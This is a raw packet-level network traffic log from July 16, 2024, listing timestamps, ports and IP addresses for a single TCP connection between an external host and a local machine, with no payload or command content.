Jul 16, 2024 19:57:18.647145033 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647181988 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647202969 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647692919 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647706032 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647733927 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647746086 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647767067 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647778988 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647793055 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647802114 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647820950 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647834063 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647849083 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647861958 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647875071 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647897959 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647908926 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647929907 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647936106 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647950888 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.647969961 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.647979021 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648006916 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648010969 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648020029 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648029089 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648049116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648071051 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648089886 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648102999 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648114920 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648135900 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648148060 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648163080 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648175001 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648201942 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648205042 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648219109 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648225069 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648231030 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648243904 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648260117 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648263931 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648267984 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648282051 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648289919 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648312092 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648344040 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648539066 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648552895 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648565054 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648576021 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648587942 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648600101 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648616076 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648621082 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648633957 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648643017 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648662090 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648696899 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648711920 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648726940 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648739100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648766041 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648777962 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648789883 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648802042 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648802996 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648833036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648837090 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648844957 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648861885 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648895025 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:18.648897886 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648911953 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648940086 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648952961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648979902 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.648992062 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649003983 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649029970 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649041891 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649071932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649080992 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649092913 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649104118 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649116039 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649127960 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649138927 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649151087 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649177074 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649189949 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649216890 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649229050 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649255991 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649267912 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649295092 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649311066 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649332047 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649343967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649372101 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649384022 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649410963 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649424076 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649435043 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649446964 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649457932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649470091 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649497986 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649507046 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649518967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649547100 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649559021 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649585962 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649597883 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649625063 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649636984 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649662971 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649674892 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649701118 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649714947 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649723053 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649738073 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649784088 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649796009 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649806976 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649818897 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649831057 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649857998 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649869919 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649898052 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649909973 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649935961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649949074 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649975061 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.649987936 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650015116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650027037 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650053024 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650064945 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650091887 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650105000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650135040 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650146961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650157928 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650171041 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650207996 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650219917 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650250912 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650276899 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650289059 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650316000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650352001 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650378942 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650392056 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650428057 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650439978 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650532961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650548935 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650603056 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650614977 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650677919 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650705099 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650782108 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650829077 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650834084 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650846004 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650923967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650929928 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650934935 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650939941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650957108 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.650969982 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651076078 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651154041 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651170969 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651175976 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651386976 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651398897 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651494026 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651597023 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651658058 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651664019 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651777983 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651782990 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651840925 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651845932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651897907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651935101 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651992083 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.651997089 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652090073 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652100086 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652297020 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652375937 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652381897 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652386904 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652426958 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652514935 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652519941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652664900 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652671099 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652676105 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652681112 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652688026 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652693033 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652748108 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652754068 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652801037 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652806044 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652973890 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.652978897 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653016090 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653060913 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653160095 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653165102 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653208017 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653213024 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653273106 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653306961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653311968 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653325081 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653403997 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653409004 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653424025 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653429031 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653537989 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653599977 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653639078 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653644085 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653656006 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653691053 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653696060 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653711081 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653836012 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653841972 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653927088 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.653932095 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654104948 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654117107 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654237986 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654257059 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654270887 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654360056 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654392004 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654397011 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654408932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654448032 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654494047 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654499054 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654575109 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654587984 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654618979 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654632092 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654684067 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654696941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654732943 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654737949 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654773951 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654778957 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654854059 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654859066 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654939890 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654946089 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654961109 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654966116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.654983997 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655010939 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655023098 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655050993 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655133963 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655139923 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655277967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655282974 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655308962 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655374050 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655464888 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655469894 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655576944 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655582905 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655653000 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655658007 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655670881 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655675888 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655756950 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655761957 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655843973 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655848980 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655894995 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655900002 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655986071 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.655997992 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656117916 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656124115 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656136036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656152964 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656157970 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656171083 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656194925 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656200886 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656215906 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656289101 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656294107 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656306028 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656323910 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656330109 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656346083 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656351089 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656407118 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656471968 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656477928 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656538963 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656544924 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656558990 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656613111 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656618118 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656622887 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656686068 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656697989 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656702995 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656725883 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656730890 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656810045 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656824112 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656872988 CEST	55615	49720	185.222.57.67	192.168.2.5
